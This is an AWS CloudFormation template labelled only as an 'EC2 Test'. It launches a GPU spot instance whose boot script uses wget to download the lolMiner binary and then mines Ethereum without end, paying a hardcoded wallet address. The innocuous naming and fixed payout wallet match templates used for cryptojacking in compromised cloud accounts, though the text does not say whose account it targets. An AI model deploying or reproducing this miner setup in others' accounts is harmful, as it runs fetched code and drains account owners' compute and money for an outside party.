AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Description: 'EC2 Test'

Parameters:
  EtherWallet:
    Type: String
    Default: "0xe62805d021fFF32715c1fEA3c7D34109dD7A7Ffa"
  AppCode:
    Type: String
    Default: ec2-sample

Resources:
  JTInstanceRole:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service:
                - ec2.amazonaws.com
            Action:
              - 'sts:AssumeRole'
      ManagedPolicyArns:
        - 'arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore'
  
  JTInstanceProfile:
    Type: AWS::IAM::InstanceProfile
    Properties:
      Roles:
        - !Ref JTInstanceRole
  
  JTLaunchTemplate:
    Type: AWS::EC2::LaunchTemplate
    Properties:
      LaunchTemplateData:
        IamInstanceProfile:
          Arn: !GetAtt JTInstanceProfile.Arn
        InstanceMarketOptions:
          MarketType: spot
          SpotOptions:
            SpotInstanceType: one-time
            MaxPrice: 0.23
        ImageId: ami-096a6497745975f89
        SecurityGroupIds:
          - !Ref JTSecurityGroup
        InstanceType: g4dn.xlarge
        UserData:
          'Fn::Base64':
            'Fn::Sub': |
                #!/bin/bash -x
                cd /tmp
                INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id | cut -b-8)
                AZ_ID=$(curl -s http://169.254.169.254/latest/meta-data/placement/availability-zone-id)
                wget -O lolminer.tar.gz https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.28/lolMiner_v1.28a_Lin64.tar.gz
                tar xvfz lolminer.tar.gz
                cd 1.28a
                cat > runner.sh << __EOF__
                #!/bin/bash -x
                SERVERS=(us1 us2 eu1 asia1)
                while (true); do
                  ./lolMiner --algo ETHASH --pool us1.ethermine.org:5555 --tls on --user ${EtherWallet}.${!INSTANCE_ID}-${!AZ_ID}
                  ./lolMiner --algo ETHASH --pool us2.ethermine.org:5555 --tls on --user ${EtherWallet}.${!INSTANCE_ID}-${!AZ_ID}
                done
                __EOF__
                chmod +x runner.sh
                nohup ./runner.sh &
      LaunchTemplateName: jt-instance

  JTSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: !Ref AppCode
      VpcId: vpc-0eb1cb6e13e5d5183
      SecurityGroupEgress:
      - IpProtocol: -1
        CidrIp: 10.0.0.0/16
      Tags:
      - Key: Name
        Value: !Ref AppCode
  JTAsg:
    Type: AWS::AutoScaling::AutoScalingGroup
    Properties:
      LaunchTemplate:
        LaunchTemplateId: !Ref JTLaunchTemplate
        Version: !GetAtt JTLaunchTemplate.LatestVersionNumber
      MinSize: 0
      MaxSize: 1
      DesiredCapacity: 1
      CapacityRebalance: false
      HealthCheckGracePeriod: 300
      VPCZoneIdentifier: 
        - 'subnet-05d9364550f87c430'
        - 'subnet-0db2d47a578a74e66'
      HealthCheckType: EC2
      TerminationPolicies:
      - ClosestToNextInstanceHour
      NotificationConfigurations:
      - TopicARN: !Ref JTNotificationTopic
        NotificationTypes:
        - autoscaling:EC2_INSTANCE_LAUNCH
        - autoscaling:EC2_INSTANCE_TERMINATE
        - autoscaling:EC2_INSTANCE_LAUNCH_ERROR
        - autoscaling:EC2_INSTANCE_TERMINATE_ERROR
      Tags:
      - Key: Name
        Value: !Ref AppCode
        PropagateAtLaunch: true

  JTNotificationTopic:
    Type: AWS::SNS::Topic